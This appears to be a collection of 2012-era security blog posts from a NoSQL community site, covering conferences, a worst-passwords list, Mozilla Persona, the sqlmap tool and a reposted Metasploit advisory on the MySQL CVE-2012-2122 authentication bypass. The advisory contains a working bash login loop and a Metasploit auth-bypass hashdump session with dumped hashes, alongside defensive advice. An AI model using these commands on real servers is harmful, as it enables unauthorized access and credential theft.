Information Security | Data story

See what are the locations of the network attacks against Luxembourg2

See what are the locations of the network attacks against Luxembourg http://map.circl.lu/ 

http://www.circl.lu/

CIRCL (Computer Incident Response Center Luxembourg) is the national Computer Security Incident Response Team (CSIRT – CERT) coordination center for the Grand-Duchy of Luxembourg.

CIRCL is operated by SMILE (“security made in Lëtzebuerg”), a State funded “groupement d’intérêt économique” (GIE), designed to improve information security and create new opportunities for Luxembourg.

The infoworld technology of the year 20131

Infoworld just published its Technology of the Year Award winners and some well known NoSQL solution have been rewarded:

  • Apache Hadoop
  • Apache Cassandra
  • Couchbase Server

http://www.infoworld.com/slideshow/80986/infoworlds-2013-technology-of-the-year-award-winners-210419#slide1

“NoSQL, no security?”1

“NoSQL, no security?” is a presentation from AppSec USA 2012, Austin, Texas.

Presented by Will Urbanski (@willurbanski)

Welcome the 25 worst passwords of 20121

SplashData, which makes password management applications, has released its annual “Worst Passwords” list compiled from common passwords that are posted by hackers. The top three — “password,” “123456,” and “12345678″ — have not changed since last year. New ones include “jesus,” “ninja,” “mustang,” “password1,” and “welcome.” Other passwords have moved up and down on the list.

The most surprising addition is probably “welcome.”

“That means people are not even changing default passwords,” CEO Morgan Slain told TIME Tech. “It doesn’t take that much time to make a new password.”

 

Here’s the full list:

1. password

2, 123456

3. 12345678

4. abc123

5. qwerty

6. monkey

7. letmein

8. dragon

9. 111111

10. baseball

11. iloveyou

12. trustno1

13. 1234567

14. sunshine

15. master

16. 123123

17. welcome

18. shadow

19. ashley

20. football

21. jesus

22. michael

23. ninja

24. mustang

25. password1

Hack.lu 20121

Hack.lu is an open convention/conference where people can discuss about computer security, privacy,

information technology and its cultural/technical implication on society.

The aim of the convention is to make a bridge of the various actors in the computer security world.

The conference takes place:

  1. at Parc Hotel Alvisse in Luxembourg

  2. the 23-25 October 2012

 

Some of the invited talks and workshop are now announced(follow this link for more details)

 

Mozilla launching Persona – decentralized and secure authentication system1

Everyone agree since quite long time now: The password problem is the single most frustrating and alienating issue for normal users.

Mozilla is launching an ambitious project, code name Persona, to solve this problem for sure and as the solution is, technically speaking, simple and elegant it might really be the long time expected solution.

 

Mozilla Persona is a completely decentralized and secure authentication system for the web based on the open BrowserID protocol. To ensure that Persona works everywhere and for everyone, Mozilla currently operates a small suite of optional, centralized servicesrelated to Persona.

Why should you and your site use Persona?

  1. Persona completely eliminates site-specific passwords, freeing users and websites from the burden of creating, managing, and securely storing passwords.
  2. Persona is easy to use. With just two clicks a Persona user can sign into a new site like Voost or The Times Crossword, bypassing the friction associated with account creation.
  3. Persona is easy to implementDevelopers can add Persona to a site in a single afternoon.
  4. Best of all, there’s no lock-in. Developers get a verified email address for all of their users, and users can use any email address with Persona.
  5. Persona is built on the BrowserID protocol. Once popular browser vendors implement BrowserID, they will no longer need to rely on Mozilla to log in.

Read on to get started!

 

More information:

https://developer.mozilla.org/en-US/docs/Persona

 

Bootstrapping Persona

sqlmap an automatic SQL injection and database takeover tool1

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Features:

  • Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase and SAP MaxDB database management systems.
  • Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query, stacked queries and out-of-band.
  • Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
  • Support to enumerate database users, users’ password hashes, users’ privileges, users’ roles, databases, tables and columns.
  • Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
  • Support to dump database tables entirely, a range of entries or specific columns as per user’s choice. The user can also choose to dump only a range of characters from each column’s entry.
  • Support to search for specific database names, specific tables across all databases or specific columns across all databases’ tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns’ names contain string like name and pass.
  • Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  • Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  • Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user’s choice.
  • Support for database process’ user privilege escalation via Metasploit’s Meterpreter getsystemcommand.

Download:

You can download the latest tarball by clicking here.

Preferably, you can download sqlmap by cloning the Git repository:

git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

CVE-2012-2122: A Tragically Comedic Security Flaw in MySQL1

Posted by HD Moore in Metasploit on Jun 11, 2012 12:51:25 AM

Introduction

 

On Saturday afternoon Sergei Golubchik posted to the oss-sec mailing list about a recently patched security flaw (CVE-2012-2122) in the MySQL and MariaDB database servers. This flaw was rooted in an assumption that the memcmp() function would always return a value within the range -128 to 127 (signed character). On some platforms and with certain optimizations enabled, this routine can return values outside of this range, eventually causing the code that compares a hashed password to sometimes return true even when the wrong password is specified. Since the authentication protocol generates a different hash each time this comparison is done, there is a 1 in 256 chance that ANY password would be accepted for authentication.

 

In short, if you try to authenticate to a MySQL server affected by this flaw, there is a chance it will accept your password even if the wrong one was supplied. The following one-liner in bash will provide access to an affected MySQL server as the root user account, without actually knowing the password.

 

for i in `seq 1 1000`; do mysql -u root –password=bad -h 127.0.0.1 2>/dev/null; done

mysql>

 

 

Exploitability

 

Although a wide range of MySQL and MariaDB versions use the vulnerable code, only some of these systems are exploitable. It boils down to whether the memcmp() routine returns values outside of the unsigned character range. According to Sergei, this is normally not the case, and the routine is normally compiled into the server as an inline function. The major exception is when GCC uses SSE optimization. Joshua Drake, a security researcher with Accuvant Labs, provided a sample application that can determine whether your system might be affected. On most systems, the results of this application match the MySQL package provided by the distribution, but the only way to be sure is to actually test it.

 

If you’d like to give this a try yourself, download Metasploit now for free.

 

So far, the following systems have been confirmed as vulnerable:

  • Ubuntu Linux 64-bit ( 10.04, 10.10, 11.04, 11.10, 12.04 ) ( via many including @michealc )
  • OpenSuSE 12.1 64-bit MySQL 5.5.23-log ( via @michealc )
  • Debian Unstable 64-bit 5.5.23-2 ( via @derickr )
  • Fedora ( via hexed  and confirmed by Red Hat )
  • Arch Linux (unspecified version)

 

Feedback so far indicates the following platforms are NOT vulnerable:

  • Official builds from MySQL and MariaDB (including Windows)
  • Red Hat Enterprise Linux 4, 5, and 6 (confirmed by Red Hat)
  • CentOS using official RHEL rpms
  • Ubuntu Linux 32-bit (10.04, 11.10, 12.04, likely all)
  • Debian Linux 6.0.3 64-bit (Version 14.14 Distrib 5.5.18)
  • Debian Linux lenny 32-bit 5.0.51a-24+lenny5 ( via @matthewbloch )
  • Debian Linux lenny 64-bit 5.0.51a-24+lenny5 ( via @matthewbloch )
  • Debian Linux lenny 64-bit 5.1.51-1-log ( via @matthewbloch )
  • Debian Linux squeeze 64-bit 5.1.49-3-log ( via @matthewbloch )
  • Debian Linux squeeze 32-bit 5.1.61-0+squeeze1 ( via @matthewbloch )
  • Debian Linux squeeze 64-bit 5.1.61-0+squeeze1 ( via @matthewbloch )
  • Gentoo 64-bit 5.1.62-r1 ( via @twit4c )
  • SuSE 9.3 i586 MySQL 4.1.10a ( via @twit4c )
  • OpenIndiana oi_151a4 5.1.37 ( via @TamberP )
  • FreeBSD 64-bit (many versions)

 

 

Most Linux vendors should have a patch out soon, if not already.

 

 

Caveats and Defense

 

The first rule of securing MySQL is to not expose to the network at large in the first place. Most Linux distributions bind the MySQL daemon to localhost, preventing remote access to the service. In cases where network access must be provided, MySQL also provides host-based access controls. There are few use cases where the MySQL daemon should be intentionally exposed to the wider network and without any form of host-based access control.

 

If you are responsible for a MySQL server that is currently exposed to the network unnecessarily, the easiest thing to do is to modify the my.cnf file in order to restrict access to the local system. Open my.cnf with the editor of your choice, find the section labeled [mysqld] and change (or add a new line to set) the “bind-address” parameter to “127.0.0.1″. Restart the MySQL service to apply this setting.

 

 

Real-world Version Information

 

Pulling from the resources of a personal side project, I was able to derive some statistics about the real-world impact of this vulnerability. This project managed to find and gather the initial handshake for approximately 1.74 million MySQL servers across the internet at large. This statistic only includes MySQL instances that were on hosts publicly exposed to the internet and not bound to localhost.

 

Host Access Control

 

Of the 1.74 million MySQL servers identified, slightly more than 50% did not enforce host-based access controls ( 879,046 vs 863,920 ). The data was gathered by scanning randomly generated IPs across the entire addressable IPv4 unicast range, excluding networks known to be “dark” or where the network administrators had opted out of the survey.

 

MySQL Version Numbers

 

If we break down the list of accessible servers by version, we can see that the 5.0.x version series accounts for over 356,000 of the entire set, followed by 285,000 running a 5.1.x version, and 134,436 running a 5.5.x version. Doing the same type of analysis on the build flavor highlights how easy it is to identify Ubuntu (43,900), Debian (6,408), and Windows (98,665) MySQL services from the banners alone. Knowing that most Ubuntu 64-bit builds are likely to be vulnerable, the real question is how many of those nearly 44,000 Ubuntu systems are running 64-bit editions of the operating system.

 

 

Making the Most of It

 

If you are approaching this issue from the perspective of a penetration tester, this will be one of the most useful MySQL tricks for some time to come. One feature of Metasploit you should be familiar with is the mysql_hashdump module. This module uses a known username and password to access the master user table of a MySQL server and dump it into a locally-stored “loot” file. This can be easily cracked using a tool like John the Ripper, providing clear-text passwords that may provide further access.

 

This evening Jonathan Cran (CTO of Pwnie Express and Metasploit contributor) committed a threaded brute-force module that abuses the authentication bypass flaw to automatically dump the password database. This ensures that even if the authentication bypass vulnerability is fixed, you should still be able to access the database using the cracked password hashes. A quick demonstration of this module is shown below using the latest Metasploit Framework GIT/SVN snapshot.

 

msfconsole

msf > use auxiliary/scanner/mysql/mysql_authbypass_hashdump

msf  auxiliary(mysql_authbypass_hashdump) > set USERNAME root

msf  auxiliary(mysql_authbypass_hashdump) > set RHOSTS 127.0.0.1

msf  auxiliary(mysql_authbypass_hashdump) > run

 

[+] 127.0.0.1:3306 The server allows logins, proceeding with bypass test

[*] 127.0.0.1:3306 Authentication bypass is 10% complete

[*] 127.0.0.1:3306 Authentication bypass is 20% complete

[*] 127.0.0.1:3306 Successfully bypassed authentication after 205 attempts

[+] 127.0.0.1:3306 Successful exploited the authentication bypass flaw, dumping hashes…

[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D

[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D

[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D

[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D

[+] 127.0.0.1:3306 Saving HashString as Loot: debian-sys-maint:*C59FFB311C358B4EFD4F0B82D9A03CBD77DC7C89

[*] 127.0.0.1:3306 Hash Table has been saved: 20120611013537_default_127.0.0.1_mysql.hashes_889573.txt

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

50 go of old creditcard customer details1

A 50 go dump file  of names, addresses, emails and phone numbers of credit card customers around the world released on Monday indicates a breach of a payment processor, but the data appears to be old.

A hacker nicknamed “Reckz0r” posted a link to the data dump on Pastebin, also writing on Twitter that he had “penetrated over 79 large banks” and holds 50GB of data on MasterCard and Visa cardholders. No card numbers were released, however.

MasterCard and Visa, which are aware of the breach, do not actually hold information on individual cardholders. That information is held by banks, as well as the many companies involved in processing credit-card transactions.

Attempts to reach some of the U.S. cardholders affected were unsuccessful, since many of the phone numbers were disconnected or incorrect.

But another person in the list, Sydney resident Julian Bale, said the information was very old. The home address published for him is seven years out of date, and an e-mail address published at least four years old, Bale said in a phone interview Tuesday.

HaxoGreen 2012 starting next July 26th1

HaxoGreen 2012 is the third iteration of the annual four-day outdoor camp in early summer 2012 organized by syn2cat. This rather informal and cosy hacker camp takes place from July 26th – 29th 2012.

The camp is organized by the community around Luxembourg’s hacker community syn2cat. We appreciate your participation, be it by holding a lecture, a workshop or presenting your projects and ideas during a 10 minutes lightning talk.

More information

 

Location

The camp is located at the scouts’ ground Belvedère near the city of Dudelange in the southern region of Luxembourg/Europe. The camping ground features adequate restrooms and shower facilities. Indoor rooms for lectures and workshops are also available.

Follow LuxNoSQL on Twitter
 
Join the LuxNoSQL Community on LinkedIn